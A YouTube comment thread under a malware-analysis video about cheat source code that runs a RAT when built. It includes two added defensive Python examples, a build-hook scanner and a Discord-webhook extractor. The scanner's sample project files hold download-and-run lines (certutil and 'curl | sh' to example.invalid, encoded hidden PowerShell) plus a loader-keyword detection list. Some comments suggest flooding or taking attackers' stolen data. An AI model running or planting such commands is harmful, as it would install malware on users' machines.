Can't believe the threat actor tried to viciously paw at you in real time.
big fan
@@randallvargas4457 massive ceiling fan
He must have realized he is analysing his malware
The threat actor was playing with you. I have had that exact experience before in real life and I still get nightmares to this day.
My father has a RAT on his crappy little work computer that died some time ago, Zeus, but refuses to clean the PC or allow anything to be touched. It's so bad you can't even plug an older phone into it or it will get infected too. New phones are fine. It jumpscares him at night; it's programmed to go through some kind of sequence of actions at night time, browsing the internet with ads. All the stuff it messes with makes the entire PC just feel extremely creepy to use. I have no idea how he sleeps at night knowing that PC is bugged and constantly mining ETH.
factory reset the computer
Yeah no. Go on his computer when he's not looking and factory reset that thing. You can factory reset in literally 30 seconds and I guarantee you it's a good thing to do here. Factory reset it, and blame it on the malware / RAT on the computer messing it up and doing that itself (it already messes with him at night).
@@NotH4llow If the PC reset process is broken, just flash a USB and reinstall Windows.
@@melj2j or rip out the cpu. force a repair
I'm unironically invested in this comment. Could you bring out some updates or even more descriptions regarding your father's computer?!
The threat actor managing to connect was definitely a jumpscare
About Discord webhooks: they have a feature where you can delete them just by having the URL, no need to have any control over the account that owns it.
It's meant to help get rid of leaked links, so anyone can delete it if it gets leaked, but it's also helpful if you find malware with a webhook link.
Maybe not just delete them. Most of that trash-tier malware comes from other open source skidware projects on GitHub. It's easy to generate fake messages in the exact format and render the data useless on the receiver's end. :)
Unfortunately since it's behind the website proxy, you cannot delete them in this manner. Still, it's nice to know in case you come across a malicious webhook.
Holy shit the RAT guy connected!! That's crazy
when? timestamp?
@@UrokLizard 7:16
They have a whole team of exploiters on call 24h. I'm surprised they didn't connect sooner.
the trolling lol
Thank you Eric for showcasing an example of this, since I've never seen it in action. IDEs (Visual Studio in this case) support running code for various reasons (mainly for automation of annoying tasks) when initializing a project, building it, exporting it, etc. This feature can be used for legit purposes, but also to run malware like this "cheat source code" does. Building from source code is not a completely safe process if you don't know *exactly* what you're dealing with.
Additionally, not only can the projects be used to infect users, but also plugins, libraries and other components of the IDE that can be changed by the user.
I love "solution" files and other crap that executes arbitrary code for god knows what reason. The next on the list is npm and its pre and post scripts.
Sometimes they do important things that make setup easier. The problem is that we've gotten into the habit of trusting random source code from the Internet. In my day, if there was something wrong, you could blame your coworkers.
NPM is a scourge even without malware hooking into it
whats wrong with npm?
@@olexayko What's right with it? I've maintained many different applications that use npm and they were all a disaster. Transitive dependencies balloon the projects you depend on. I see things pulled in that aren't used, but no one removes them in case there is something they do that we don't see. Dependencies that are out of date and cannot be upgraded without upgrading everything. npm makes it easy to create a terrible application.
@@username7763 damn. sounds bad
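The two comments above describe the same class of problem from two ecosystems: a Visual Studio project can run commands when it is built (Exec tasks, pre/post-build events, imported .targets files, custom task assemblies), and an npm package can run lifecycle scripts during `npm install`. The following is an added example, not code from the video or from any project discussed in the thread, of a small triage script that lists every such hook in a downloaded project before you build it. The sample .csproj and package.json are constructed for the example (the encoded PowerShell payload is just "IEX"; the URLs use the reserved `example.invalid` domain), and the keyword list is an assumption about what commonly appears in loader one-liners, not a definitive signature set.

```python
import json
import re
import xml.etree.ElementTree as ET

# Assumed keyword list for quick flagging of downloader/loader one-liners.
# It is a triage hint, not a verdict: read every hook the scanner prints.
SUSPICIOUS = re.compile(
    r"powershell|pwsh|-enc|cmd(\.exe)?\s*/c|certutil|mshta|bitsadmin"
    r"|\bcurl\b|\bwget\b|Invoke-WebRequest|DownloadString|https?://", re.I)

# npm lifecycle scripts that run automatically during `npm install` / `npm ci`.
NPM_AUTO_SCRIPTS = ("preinstall", "install", "postinstall", "prepare", "prepublish")


def _local(tag):
    # Old-style (non-SDK) projects carry an XML namespace; strip it.
    return tag.rsplit("}", 1)[-1]


def scan_msbuild(xml_text):
    """List every place an MSBuild project runs code as part of a build."""
    root = ET.fromstring(xml_text)
    parent = {child: p for p in root.iter() for child in p}
    findings = []

    def enclosing_target(el):
        # Walk up to the <Target> so the report says when the command fires.
        while el is not None and _local(el.tag) != "Target":
            el = parent.get(el)
        if el is None:
            return "(no target)"
        hooks = ", ".join(f"{k}={el.get(k)}" for k in ("BeforeTargets", "AfterTargets") if el.get(k))
        return f"Target {el.get('Name')}" + (f" ({hooks})" if hooks else "")

    for el in root.iter():
        tag = _local(el.tag)
        if tag == "Exec":
            cmd = el.get("Command", "")
            findings.append(dict(kind="Exec", where=enclosing_target(el), what=cmd,
                                 suspicious=bool(SUSPICIOUS.search(cmd))))
        elif tag in ("PreBuildEvent", "PostBuildEvent"):
            cmd = (el.text or "").strip()
            if cmd:
                findings.append(dict(kind=tag, where="PropertyGroup", what=cmd,
                                     suspicious=bool(SUSPICIOUS.search(cmd))))
        elif tag == "UsingTask":
            # A custom task (DLL or inline code) is arbitrary code inside the
            # MSBuild process itself, so it always deserves a look.
            src = el.get("AssemblyFile") or el.get("AssemblyName") or "inline"
            findings.append(dict(kind="UsingTask", where=src,
                                 what=el.get("TaskName", "?"), suspicious=True))
        elif tag == "Import":
            proj = el.get("Project", "")
            # Imports of the SDK's own files are routine; anything else can pull
            # in targets the .csproj you are reading never shows you.
            if not proj.startswith("$(MSBuild"):
                findings.append(dict(kind="Import", where=proj, what="external targets file",
                                     suspicious=bool(SUSPICIOUS.search(proj))))
    return findings


def scan_package_json(text):
    """List the npm scripts that run without anyone typing `npm run`."""
    scripts = json.loads(text).get("scripts", {})
    return [dict(name=n, what=scripts[n], suspicious=bool(SUSPICIOUS.search(scripts[n])))
            for n in NPM_AUTO_SCRIPTS if n in scripts]


# Constructed sample inputs (not taken from the video or any real project).
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net48</TargetFramework>
    <PreBuildEvent>powershell -nop -w hidden -enc SQBFAFgA</PreBuildEvent>
  </PropertyGroup>
  <Import Project="build\\extra.targets" />
  <Target Name="Prep" BeforeTargets="Build">
    <Exec Command="dotnet tool restore" />
    <Exec Command="cmd /c certutil -urlcache -f http://example.invalid/x.exe %TEMP%\\x.exe" />
  </Target>
</Project>
"""

SAMPLE_PACKAGE_JSON = """{
  "name": "example-cheat-loader",
  "version": "1.0.0",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "node -e \\"require('child_process').exec('curl http://example.invalid/s | sh')\\""
  }
}
"""

if __name__ == "__main__":
    for f in scan_msbuild(SAMPLE_CSPROJ) + scan_package_json(SAMPLE_PACKAGE_JSON):
        flag = "!!" if f["suspicious"] else "  "
        print(flag, f)
```

Run it against the .csproj/.vcxproj, any .targets/.props files, and package.json of a repository before opening it in the IDE; a build hook that downloads and runs something is the whole point of this kind of "source code" and shows up in the report before MSBuild ever gets to execute it. A .suo file is a binary side file and is not covered by this scanner at all, so treat one shipped with a "source" download as a separate red flag.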
Thank you Eric that your channel exists, this is exactly the type of opsec that we need more of on YouTube. Simple demos of behaviours in context. Keep it up, thank you 👍
I wonder what it would be like to watch the bad actor mess around with the vm, what key points they would target, things they'll generally do.
Neat, I didn't know a RAT could invert the mouse click... Now I wonder if my primary desktop got compromised a few years back
You can basically do anything if you have a RAT
They usually come loaded with Visual Basic "prank" scripts (or code that does the same thing). They can also hide the taskbar, disable right-clicking, flip the desktop, make the CD tray open and close sporadically (if you have one), change the wallpaper, display a fake BSOD, etc. They pretty much give you access akin to being physically in front of the machine.
Doing too much all at once is one hell of a distraction and it's meant to be.
If you ever come across their upload area, best to just keep sending random junk to it (made to look like what they are looking for) until it either exceeds their service limit (some free services, which you can also report for abuse) or they get fed up with fake stuff. For Telegram bot uploads, it is also possible to delete all of their stolen stuff if you want to (or steal it yourself, to maybe identify and warn the owners of the data).
Eric is probably one of the best channels to watch when you have to wake up in 4 hours. cool stuff analysis, good software/general advice.
“Hello everybody” not fast enough
I’d love to see what the threat actor does once they connect to the machine, out of morbid curiosity
.Net 4 is still supported. It literally says supported versions on the download page you clicked. My guess is they want 4.x since it’s the last version that includes the command line compiler (csc.exe) to build the malware on the target.
Hey Eric! Just wanted to let you know that I really value your videos and that I have learnt a lot.
You can delete a Discord webhook via API stuff. You don't have to work at Discord to do it.
if we don't know the actual webhook.
@ Oh, fair point. There are always ways to reverse engineer. I don't know how the webhook gets stored for the website-based stuff though.
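Both webhook sub-threads above make the same two points: a Discord webhook can be deleted by anyone holding its URL, and that only helps when the URL is actually recoverable from the sample (it is not when the malware talks to an intermediary website instead). The following is an added example, not code from the video or from any stealer it analyses, of pulling webhook URLs out of a strings dump, including ones stored base64-encoded, and building the unauthenticated DELETE that Discord's `DELETE /webhooks/{id}/{token}` endpoint accepts. The strings dump, the webhook IDs and the tokens are constructed for the example; nothing is sent unless you call `delete_webhook(hook, send=True)` yourself.

```python
import base64
import binascii
import re
import urllib.request

# Discord webhook URL shapes: plain, ptb/canary hosts, optional API version.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/(?:v\d+/)?webhooks/(\d{17,20})/([\w-]+)")
# Long runs of the base64 alphabet: skidware often stores the URL encoded so it
# does not show up in a plain `strings` run. Threshold is an assumption.
B64_RE = re.compile(r"[A-Za-z0-9+/]{48,}={0,2}")


def _decoded_blobs(text):
    """Yield the UTF-8 text of every base64 candidate that decodes cleanly."""
    for m in B64_RE.finditer(text):
        try:
            yield base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            continue


def extract_webhooks(text):
    """Return unique webhooks found in a strings dump, plain or base64-encoded."""
    hooks, seen = [], set()
    for blob in [text, *_decoded_blobs(text)]:
        for m in WEBHOOK_RE.finditer(blob):
            wid, token = m.group(1), m.group(2)
            if (wid, token) not in seen:
                seen.add((wid, token))
                hooks.append({"id": wid, "token": token})
    return hooks


def delete_request(hook):
    """Build the DELETE for the token-authenticated webhook endpoint.

    Discord accepts this with no bot or user token: holding the webhook URL
    is the only credential, which is exactly why a leaked one is deletable.
    """
    url = f"https://discord.com/api/webhooks/{hook['id']}/{hook['token']}"
    return urllib.request.Request(url, method="DELETE")


def delete_webhook(hook, send=False):
    """Return the prepared request, or send it and return the HTTP status (204 on success)."""
    req = delete_request(hook)
    if not send:
        return req
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


# Constructed strings dump for the example: one plain webhook (listed twice, to
# show de-duplication) and one stored base64-encoded. IDs/tokens are made up.
_HIDDEN = base64.b64encode(
    b"https://discord.com/api/webhooks/123456789012345678/abc_DEF-ghi").decode()
SAMPLE_STRINGS = f"""
GetForegroundWindow
https://discord.com/api/webhooks/987654321098765432/tok-EN_1
Mozilla/5.0
{_HIDDEN}
https://discord.com/api/webhooks/987654321098765432/tok-EN_1
"""

if __name__ == "__main__":
    for h in extract_webhooks(SAMPLE_STRINGS):
        print(h["id"], delete_request(h).full_url)
```

Feed it the output of `strings` (or the decompiled C# source) from the sample; when the malware reports to a third-party relay site rather than to Discord directly, the script will find nothing, which is the case the reply above describes. A successful DELETE returns 204 and the stealer's exfiltration goes dark for every victim using that build, so check the result before assuming anything.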
I quickly recognized the format of the .suo file, that's a compound binary file format from Microsoft. You're right about the UTF-16 strings, since names of streams/storages are stored using UTF-16 (can't remember if they support the big endian version, but I usually only see little endian).
I actually work with Outlook message files a ton so I recognized its parent format super quickly. If you want to analyze it some more and figure out what the parts are, there are a few Python modules that can do it easily, though the one I know best is olefile.
I also know that I've worked with them too much when I knew exactly what all of the ff ff ff ff sections are for (nodes that are empty).
Crazy how I'm earning a bachelor's in cybersecurity but my university might as well just be a certification farm at this point, because I learn everything awesome in the evening from channels like yours.
I have an online friend who's been saying the same thing with stuff I share with him lol schools need to step up
5:06: wtf was that RAR file …
0:35 The correct option is actually to open with "Visual Studio Version Selector", because if you have multiple versions of Visual Studio, it'll automatically open it with the version that matches the solution.
Doesn't really matter considering this is a VM & not some kind of tutorial on using visual studio.
@Lorh_o yeah, doesn't really matter in this case, I just wanted to point it out
13:04 an “x client” could also refer to a client for the x windowing system, which may be more common
Why would it be on Windows, though?
Maybe for Windows Subsystem for Linux?
Is PuTTY a virus? I saw that on my PC after Christmas Day 2022, after looking online and installing Sony's proprietary memory card formatting tool (as they took it down from their website). Then all my desktop icons had speakers on them instead of the arrow. But I'm still not sure that was the culprit, as a piece of software I used to use a lot from the Microsoft Store was causing all sorts of problems, and since that Christmas I never used either again. It was very scary. I wanted to get a recording of it but I didn't know if my PC would make it if I did, so I held the power button until it shut off and I didn't touch it again until half way through the following year. The only thing that threw an error during the force shutdown was that software from the Microsoft Store, and it was a very dodgy error (fake error); the error was nonsense. Here is an example of basically what it was saying: "Error: Software is Working Fine" (that's what I mean, it was just nonsense). That's not what it said, it was just the only example that came to mind, sorry.
Just want to add that the non-destructive removal isn't really something anyone should rely on. If you are hit this hard there is only one solution: reinstall. And even then that might not be enough if it has embedded itself in other places than your OS.
Not really done other than by state actors.
You are misinformed @@FadkinsDiet
@@FadkinsDiet Zeus loves phones.
Is this about FodyWeaver specifically? I've encountered that before because of another developer but I had removed it at the time, seeing it as unnecessary.
5:20 What the hell, I just saw when the video was posted, but I knew about this type of code execution for like half a year. Damn Microsoft.
I'm sure they know about it too funnily enough, as they have a security feature for Visual Studio Code that blocks executing anything from untrusted directories by default.
As someone who has coded mod menus and programs for CoD games, I had false positive hits running VirusTotal on them, but this definitely has a virus in it lol
The only serious viruses I've ever had infect my computer were from game or other software cracks.
I was doing some of my own analysis on a program but it seems to bluescreen once you try and debug it, any tips?
Please, someone explain where he got this source code from and what this code does, in summary?
What distro did you use to film this? (I saw you using KDE Plasma when configuring the VM)
hi eric, could you try to look at some JAR files for minecraft, there is a huge community for skyblock (a game on hypixel) and there is a LOT of ratting happening, like every second mod is a rat. could you maybe try to make a video on how to see if code is malicious or not
ps i could show some examples which are well known
Hey Eric, what is the official download for Process Explorer?
microsoft store sysinternals suite
@@jakem5039 Thanks!
Will you make a video about NL Hybrid? My antivirus says it's a virus but they say it is a false positive.
Is this a new exploit?
ye
.suo exploit has been around for a good minute
Hey, I'm looking for the program you used, FRST64 / Farbar Recovery Scan Tool. I want to download it from a trusted source but I'm not sure which source I can trust, if someone could help me please.
that's crazy someone tried to crash the party lol
Lesson: Never get cheats for video games
Lesson: Download from trusted sources, and check whatever you're installing
@@chief-u3f That one too
Or if you do at least don't be a fool about it
Just create them yourself
@@chief-u3f That one too (TH-cam deleted my reply :()
Why you did this on Windows 10?
Can you test a roblox exploit called swift ?
Wait, am I correct to assume this malware doesn't check anything Firefox related, since it only looked at Chrome and Edge?
Not worth it, Firefox has such small market share
@@FadkinsDiet Meaning I'm immune to this malware! (not really lol, but at least to the session grabber)
it steals firefox too
I am not gonna download anything no more
for me xclient sounds like something for X11
POV: You rat someone go onto the PC and see its Eric parker 💀
2:38 - Oh God good to see I'm not alone with that particular issue (Firefox just being broken for me it was Reddit being the most broken)
Can you check if project nocturno is legit?
Can you see if roblox executor: Solara is a malicious program?
MS-HTA vs MS-Heych-TA
FIGHT!
FIGHT vs FIGCHT
MS-Hoo Tee Aaa
hey, where did you download FRST64, whats the source?
Can't tell you:
1. That's dangerous, it can infect your PC involuntarily by accidental clicks
2. Bad actors can spread it to cause chaos
3. That's illegal
4. Google's TOS says otherwise.
Can you make a video about NLHybrid i don’t know if it’s a virus or not
It's safe, I used it and so does my friend who was an old mod
Never thought that source code can be malware... Now I'm pretty sure I have malware on my PC. Thanks for the explanation buddy, I'll be more careful.
can you make video about NL Hybrid please!?
can you make a wire guard tutorial
Could you do a qemu tutorial?
Just don't use cheats off the internet. Make your own.
Just don't play games that you need cheats to play. Make your own games.
@@hereniho Don't play on the operating system just make your own.
Just don't use cheats? It's really not that hard to NOT ruin the experience for everyone else, yourself included.
I'm glad there is malware in this, cheaters deserve to have to reinstall Windows and lose all their files.
@@selectionn Who ruined your Fortnite experience? People are gonna cheat, might as well be smart enough to make your own.
Saying that like it's not gonna take a whole year to learn coding, reverse engineering, assembly and getting around anti-cheats. Maybe just be legit and don't cheat. And if you suck, then get good.
The irony of using Opera while analyzing malware
Also, inverting the mouse buttons may indicate the RATer being left-handed.
no he just spammed every "fun" feature existing in their malware
@ Yeah, probably.
lets all love lain
Yo E can you do one on pulover's macro creator they say it has malware.
Am I the only one taking offence to opening a .proj file downloading and running .exe files without asking?
paws at eric
bot
@@grekandrew8995 im not a bot...???
nap time for you
@@Vaximous eepy
:3
This was a very neat video, today I learned.
Do a video on the fake CAPTCHA pages used to distribute infostealers
Comment to boost the algorithm, incredible work
Shit's scary
In semi related news, I just got an email about the GTA:SA leak people are talking about. Apparently it is fake and contains a malicious exe, source: www.heise.de/en/news/Leaked-source-code-of-GTA-San-Andreas-allegedly-contains-ransomware-10228731.html
It's fake news. The real one is called gtasasc.7z while this guy shows gtasa.7z
As for the real zip, nobody knows the password
@user-lx2ep9hd4k Might be crackable by guessing keywords. Tominecon was an old encrypted Minecraft-related zip file that got cracked last year. Not by breaking the encryption but by automatically trying passwords from leaks and data breaches.
Yeah, if that happens to me I'm just installing Windows again.
So antivirus is a scam..
child birth is a scam.
he used xworm on the vm
NOO WAYY THATS CRAZY!!!
yo i'm on time
omg miku hi big fan
@KayleighOwO your name seems familiar
@miku10v3 meow :3
@@KayleighOwO meow~ :3
Another reason to switch to cmake.
I hate microsoft
We all do, mate. We all do.
@@какойтошизик What would happen if microsoft suddenly lost all windows source code after Windows 7?
If you aren't smart enough to make your own cheats, that's a you problem buddy.
thanks eric
hi eric parker
whos here from iiDk?
ok
So this is a Microsoft specific exploit? One more reason to not use VS Code.
:clueless:
@@min3craftpolska514 You forgot to write anything in your comment.
not vs code, but visual studio project.
@@Glockenspiels "Visual Studio project" is not a thing. You probably meant Code OSS, a.k.a. Visual Studio Code - Open Source, which is made by Microsoft the same way that Chromium and Android are made by Google.
Eric, you got some nice 127 GB of RAM and quite a good AMD Ryzen Threadripper PRO 3995WX 64-core ;)
hii
Hi
hi
wtf
Why are there so many children here asking you to look at roblox malware 😂
damn
eric i love you
WAKE UP F1LTHY
Type shii
ericsniped
Great channel!
Can you please make a video about how to recognize and determine all the files running in Task Manager? How to recognize what is what? How to research service hosts etc.?
Conclusion: only acquire open-source software from trusted code hosting websites, like GitHub, GitLab, Gitea, SourceHut, etc.
Lol there is so much malware on github he's even made a video about it
@@mrtz187 I used gitea for our team. highly recommend
git will let anyone post anything.
no, conclusion: don't download project files, build it yourself instead & check the source code before.
@@monkaSisLife are makefiles safer?
crazy how im friends with the guy who made this xd
💀
wow thats so cool bro, what a freaking bad ass(sorry for swearing), can i be your friend?
NO ONE CARES LMAO. You're literally like 10 years old. Be a good little Timmy and dont go around downloading cheats for online games, it ruins the fun for us adults who just want to relax and enjoy an online video game.
blud youre a snitch
i know the owner of this
If you want more info, respond to this message
And if you wanna know where it's hidden, just respond
@@塞kyoto塞 12 year olds thinking they are cool lmao so cringe
sugma
@@塞kyoto塞I'm gonna stalk this account and report everything it does.
Yo Eric, you should check out ExitLag. I've seen rumours about it being a RAT and I have it and am a little worried.
hi